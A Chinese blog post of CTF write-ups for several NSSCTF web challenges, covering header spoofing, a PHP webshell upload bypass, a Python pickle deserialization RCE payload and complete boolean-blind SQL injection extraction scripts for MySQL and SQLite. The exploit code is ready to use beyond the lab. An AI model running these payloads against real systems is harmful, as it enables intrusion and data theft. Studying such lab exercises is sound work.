NSSCTF第13页(3)

最新推荐文章于 2024-07-13 23:11:02 发布
最新推荐文章于 2024-07-13 23:11:02 发布
阅读量177 收藏
点赞数
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwwyyyrre/article/details/134643111
版权

[FSCTF 2023]巴巴托斯!

看见个输入路径,打了半天没进去,php伪协议也打不进去,

用dirsearch扫一下

看了半天才看出来,那串英文

Access Denied! I love FSCTF Browser

是要用FSCTF浏览器,改一下ua头就行了

说不是本地,referer输入127.0.0.1

发现没回显,用php伪协议来读取

成功读取,得到flag

 [SWPUCTF 2022 新生赛]file_master

限制了文件类型,只能传jpg类型,抓包改包

类型长宽必须小于20

还是第一次遇到这种题,可以直接定义长宽的值为1

#define hight 1

#define width 1

发现还是不行

可能是对php头进行了检测,修改一下一句话木马

成功绕过

ls /

cat /flag

[HZNUCTF 2023 preliminary]pickle 

代码审计

放到皮查姆里边看看,利用ctrl+alt+L规格化代码

gpt解释

去查了一下才知道pickle是python中的反序列化函数

python pickle模块常见函数_pickle函数-CSDN博客

Python 序列化 pickle 模块_pickle序列化-CSDN博客

第一次见python反序列化的题

 NSSCTF-[HZNUCTF 2023 preliminary]-web-CSDN博客

发现有两个网页但是访问不进去

根据这篇博客进行的复现,主要是在函数的理解以及脚本的编写上

import pickle  
import base64  
  
class rayi(object):  
def __reduce__(self):  
#return eval,("__import__('o'+'s').system('ls / | tee a')",)  
return eval,("__import__('o'+'s').system('env | tee a')",)  
  
a=rayi()  
print(pickle.dumps(a))  
print(base64.b64encode(pickle.dumps(a)))

 

得到flag文件是在.sh文件里

查看环境变量得到flag

本题重点:

python代码里先进行return以覆盖下一个return的返回值。所以本题可以让反序列化之后的值先进行return的操作

python中,os就是可以调用system的函数:

os模块负责程序与操作系统的交互,提供了访问操作系统底层的接口;即os模块提供了非常丰富的方法用来处理文件和目录。

所以os.system('ls /')也是可以读取根目录的。但是由于eval函数没有回显,所以用tee将内容复制到a.txt,然后再用/readFile函数读取文件就可以了。
 

[WUSTCTF 2020]颜值成绩查询 

输入1有固定回显,输入2-4发现有乱码,输入5发现用户不存在,输入其他特殊字符无回显,也无报错回显

利用大佬的二分法脚本

利用的时候只需要改一下url和success_message,基本通用的脚本

import time

import requests

Success_message = "Hi"
#使用时改一下Success_message、url!!!!!!!!!!!!!!!!!!!!!!

def database_name():
    db_name = ''
    for i in range(1, 10):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        db_name += chr(mid)
        print("数据库名: " + db_name)
    return db_name


def table_name():
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
                            'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print("表名: " + name)
    table_list = name.split(",")
    for tab_name in table_list:
        column_name(tab_name)


def column_name(tab_name):
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
                            'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
                            '1)) > %d)' % (tab_name, j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print(("%s表的字段名: " + name) % tab_name)
    column_list = name.split(",")
    for col_name in column_list:
        get_data(tab_name, col_name)


def get_data(tab_name, col_name):
    data = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (
                col_name, tab_name, i, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        data += chr(mid)
        print(("%s表的%s字段数据: " + data) % (tab_name, col_name))


if __name__ == '__main__':
    url = input("请输入url:")
    database_name()
    table_name()

大佬博客:

[WUSTCTF2020]颜值成绩查询_Tajang的博客-CSDN博客

 得到flag

[NSSRound#1 Basic]sql_by_sql

先随便注册一个用户,进到页面里

在修改密码页面的源代码处看到提示

所以注册用户admin'--并修改密码就可以登录admin,在home页面的查询有两种回显,exist或no user,显然是布尔盲注,需要注意的是数据库是sqlite,查询语句不太一样。 

SQLite数据库介绍与使用-CSDN博客 

SQLite中有一个类似information_schema功能的表sqlite_master
 
其中有五个字段
 
    type:记录项目的类型,如table、index、view、trigger
 
    name:记录项目的名称,如表名、索引名等
 
    tbl_name:记录所从属的表名,如索引所在的表名。对于表来说,该列就是表名本身
 
    rootpage:记录项目在数据库页中存储的编号。对于视图和触发器,该列值为0或者NULL
 
    sql:记录创建该项目的SQL语句 

之前做过一道题,就是利用二次注入拿权限然后得flag,这道题开始的做法和那道题类似

先注册一个admin'--+ 因为admin'#报错了,用这个注册的admin来覆盖之前的那个admin

通过修改密码,把admin的密码改掉,然后再进行登录admin,发现成功登录

输入id查询发现回显不是no user 就是exist

 还发现一个post请求的url路径,cooike里有一个session值

附脚本给大家 session值也要记得改

# python sqlmap.py -u "http://node4.anna.nssctf.cn:28735/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZPHIxA.lAQc_M-IaV4V6i6T9b7Wwks4sic" -T flag -C flag --dump --level 3
import requests
import time
import string

str = string.ascii_letters + string.digits + "{}|-~,"
# print(str)
print(string.printable)
url = "http://node4.anna.nssctf.cn:28682/query"
s = requests.session()
flag = ""
headers = {'Cookie': "session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZWbD1g.RMAlNj04CYQl5Z18DImPWi4Tgto"}

for i in range(0, 100):
    for x in str:
        data = {
            # 'id': "1 and substr((select name from sqlite_master where type='table' limit {},1),1,1)='{}'".format(i,x),
            'id': "1 and substr((select flag from flag limit 0,1),{},1)='{}'".format(i, x)
        }
        res = s.post(url=url, data=data,headers=headers)
        # print(data)
        # print(res.status_code)
        # time.sleep(0.1)
        if "exist" in res.text:
            flag += x
            print(flag)
            break
    if chr == '%':
        break
# select flag from flag 获得flag
# select sql from sqlite_master where type='table' and name='flag'爆列

 得到flag

 

 

 

 

呕...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过
m0_60607895的博客
05-05 1004
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。它可以在对象从其序列化状态恢复时,对对象进行自定义的状态还原。构造方法,在反序列化的时候自动执行,类似于php中的_常用payload(没有os模块)
nssctf文件test
03-30
1
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
Jay17的博客
08-16 1230
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
pickle反序列化
rev1ve的博客
12-22 1403
与PHP类似,python也有序列化功能以长期储存内存中的数据。pickle是python下的序列化与反序列化包。python有另一个更原始的序列化包marshal,现在开发时一般使用pickle。与json相比,pickle以二进制储存,不易人工阅读;json可以跨语言,而pickle是Python专用的;pickle能表示python几乎所有的类型(包括自定义类型),json只能表示一部分内置类型且不能表示自定义类型。
CTF题型 Python中pickle反序列化进阶利用&opcode绕过
qq_39947980的博客
03-26 2759
Python 的 opcode(operation code)是一组原始指令,用于在 Python 解释器中执行字节码。在 Python 中,源代码首先被编译为字节码,然后由解释器逐条执行字节码指令。每个 opcode 都有其特定的功能,用于执行不同的操作,例如变量加载、函数调用、数值运算、控制流程等。因此os中o可以存在,但是单独的o是被禁止的,因为os被替换成Os,但对后续ser_data不影响。构造方法,在反序列化的时候自动执行,类似于php中的_功能:从string中读出序列化前的obj对象。
HZNUCTF2023 web
weixin_63231007的博客
05-07 1389
HZNUCTF校赛 赛后复现
[HZNUCTF 2023 preliminary]ppppop
m0_70819573的博客
04-22 420
base64解密后得到序列化的字符串:O:4:"User":1:{s:7:"isAdmin";很简单的pop链构造,class A __destruct()->class B __call()通过抓包可以发现base64加密的user cookie。通过payloadpost传参获得flag。1.代开环境,发现一片空白。将零改为一后可以显示源码了。
[SWPUCTF 2021 新生赛]traditional
03-15
首先,我们可以将八卦图方位转换为二进制数字,然后将其转换为十进制数字,最后将其转换为 ASCII 码。 在这个过程中,我们可以使用八卦图密码来加密和解密信息。八卦图密码是一种古典密码,它可以用来加密和解密...
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过(1)
2401_84009679的博客
04-12 776
训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
HZNUCTF2023初赛
Emmaaaaa's blog
03-27 1011
cpdd:摩斯密码 classical:base + 凯撒 child_OTP:异或 child_quadratic_residue:直接开根法 child_proof_work:暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam:异或 child_RSA:基础RSA解密 RSA1:维纳攻击 很简单的数学1:离散对数(discrete_log) child_gcd:费马小定理 (a ** (p-1) = 1 mod p) RSA3:模运算法则,离散对数
2023HZNUCTF-findme(web)
qq_44640313的博客
04-03 262
sudo的提权和find命令执行
HZNUCTF2023-部分wp
m0_73393932的博客
04-04 562
逆向
HZNUCTF2023部分wp-Reverse
m0_73393932的博客
04-04 712
逆向
HZNUCTF-ezflask
qq_44640313的博客
03-27 560
jinja2的注入
展开说说:Android之View基础知识解析
最新发布
Hidanchaofan的博客
07-13 462
View虽不属于Android四代组件,但应用程度却非常非常广泛。在Android客户端,君所见之处皆是View。我们看到的Button、ImageView、TextView等等可视化的控件都是View,ViewGroup是View的子类因此它也是View。但是现在我们把View和ViewGroup当成两个类来看待,ViewGroup可以容纳View和ViewGroup,但View不可以再容纳其他View或ViewGroup,这种容纳的关系可以一直延伸仿佛一棵大树,从内而外有了父子关系,因此有个概念叫做Vi
Android高级——Logger日志系统
松仔Log的博客
07-11 1062
1是因为标签和内容后面跟着’\0’,用来区分和解析。
nssctf的jwt问3
08-17
首先将图像的背景填充为白色。 2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值